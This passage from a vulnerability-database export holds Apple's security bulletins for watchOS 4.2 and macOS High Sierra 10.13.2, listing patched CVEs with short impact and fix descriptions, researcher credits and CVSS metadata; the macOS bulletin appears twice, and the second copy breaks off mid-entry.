updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## watchOS 4.2\n\nReleased December 5, 2017\n\n**Auto Unlock**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added January 10, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple Watch (1st Generation) and Apple Watch Series 3 \nReleased for Apple Watch Series 1 and Apple Watch Series 2 in [watchOS 4.1](<https://support.apple.com/kb/HT208220>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## No impact\n\nwatchOS 4.2 is not impacted by the following issue: \n\n**Kernel**\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-05T00:00:00", "type": "apple", "title": "About the security content of watchOS 4.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13855", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13876", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7162", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-05T00:00:00", "id": "APPLE:121C0C2C932F899F870D9D5665610ED0", "href": "https://support.apple.com/kb/HT208325", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-07T01:01:29", "description": "# About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nThis document describes the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nReleased December 6, 2017\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: APFS encryption keys may not be securely deleted after hibernating\n\nDescription: A logic issue existed in APFS when deleting keys during hibernation. This was addressed with improved state management.\n\nCVE-2017-13887: David Ryskalczyk\n\nEntry added June 21, 2018\n\n**apache**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory\n\nDescription: Multiple issues were addressed by updating to version 2.4.28.\n\nCVE-2017-9798: Hanno B\u00f6ck\n\nEntry updated December 18, 2018\n\n**Auto Unlock**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**Contacts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: Sharing contact information may lead to unexpected data sharing\n\nDescription: An issue existed in the handling of Contact sharing. This issue was addressed with improved handling of user information. \n\nCVE-2017-13892: Ryan Manly of Glenbrook High School District 225\n\nEntry added October 18, 2018\n\n**CoreAnimation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**curl**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Malicious FTP servers may be able to cause the client to read out-of-bounds memory\n\nDescription: An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-1000254: Max Dymond\n\n**Directory Utility**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nNot impacted: macOS Sierra 10.12.6 and earlier \n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. This was addressed with improved credential validation.\n\nCVE-2017-13872\n\n**ICU**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13883: Yu Wang of Didi Research America\n\nCVE-2017-7163: Yu Wang of Didi Research America\n\nCVE-2017-7155: Yu Wang of Didi Research America\n\nEntry updated December 21, 2017 \n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation.\n\nCVE-2017-13878: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-13875: Ian Beer of Google Project Zero\n\n**IOAcceleratorFamily**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7159: found by IMF developed by HyungSeok Han (daramg.gift) of SoftSec, KAIST (softsec.kaist.ac.kr)\n\nEntry updated December 21, 2017 \n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\n\nCVE-2017-13858: an anonymous researcher\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry updated January 5, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017 \n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated January 11, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-13871: Lukas Pitschl of GPGTools\n\nEntry updated December 21, 2017\n\n**Mail Drafts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nEntry updated January 10, 2018\n\n**OpenSSL**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-3735: found by OSS-Fuzz\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: This bugs can allow remote attackers to cause a denial of service\n\nDescription: Public CVE-2017-12837 was addressed by updating the function in Perl 5.18\n\nCVE-2017-12837: Jakub Wilk\n\nEntry added October 18, 2018\n\n**Screen Sharing Server**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A user with screen sharing access may be able to access any file readable by root\n\nDescription: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling.\n\nCVE-2017-7158: Trevor Jacques of Toronto\n\nEntry updated December 21, 2017\n\n**SIP**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2017-13911: Timothy Perfitt of Twocanoes Software\n\nEntry updated August 8, 2018, updated September 25, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An unprivileged user may change Wi-Fi system parameters leading to denial of service\n\nDescription: An access issue existed with privileged Wi-Fi system configuration. This issue was addressed with additional restrictions.\n\nCVE-2017-13886: David Kreitschmann and Matthias Schulz of Secure Mobile Networking Lab at TU Darmstadt\n\nEntry added May 2, 2018\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**Mail**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\nEntry added February 6, 2020\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: July 27, 2020\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "apple", "title": "About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000254", "CVE-2017-12837", "CVE-2017-13847", "CVE-2017-13848", "CVE-2017-13855", "CVE-2017-13858", "CVE-2017-13860", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13871", "CVE-2017-13872", "CVE-2017-13875", "CVE-2017-13876", "CVE-2017-13878", "CVE-2017-13883", "CVE-2017-13886", "CVE-2017-13887", "CVE-2017-13892", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-3735", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7154", "CVE-2017-7155", "CVE-2017-7158", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7163", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173", "CVE-2017-9798"], "modified": "2017-12-06T00:00:00", "id": "APPLE:B7AA5B9368DE4BD135A602B017EB0259", "href": "https://support.apple.com/kb/HT208331", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:48", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nReleased December 6, 2017\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: APFS encryption keys may not be securely deleted after hibernating\n\nDescription: A logic issue existed in APFS when deleting keys during hibernation. This was addressed with improved state management.\n\nCVE-2017-13887: David Ryskalczyk\n\nEntry added June 21, 2018\n\n**apache**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory\n\nDescription: Multiple issues were addressed by updating to version 2.4.28.\n\nCVE-2017-9798: Hanno B\u00f6ck\n\nEntry updated December 18, 2018\n\n**Auto Unlock**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**Contacts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: Sharing contact information may lead to unexpected data sharing\n\nDescription: An issue existed in the handling of Contact sharing. This issue was addressed with improved handling of user information. \n\nCVE-2017-13892: Ryan Manly of Glenbrook High School District 225\n\nEntry added October 18, 2018\n\n**CoreAnimation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**curl**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Malicious FTP servers may be able to cause the client to read out-of-bounds memory\n\nDescription: An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-1000254: Max Dymond\n\n**Directory Utility**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nNot impacted: macOS Sierra 10.12.6 and earlier \n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. This was addressed with improved credential validation.\n\nCVE-2017-13872\n\n**ICU**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13883: Yu Wang of Didi Research America\n\nCVE-2017-7163: Yu Wang of Didi Research America\n\nCVE-2017-7155: Yu Wang of Didi Research America\n\nEntry updated December 21, 2017 \n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation.\n\nCVE-2017-13878: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-13875: Ian Beer of Google Project Zero\n\n**IOAcceleratorFamily**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7159: found by IMF developed by HyungSeok Han (daramg.gift) of SoftSec, KAIST (softsec.kaist.ac.kr)\n\nEntry updated December 21, 2017 \n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\n\nCVE-2017-13858: an anonymous researcher\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of 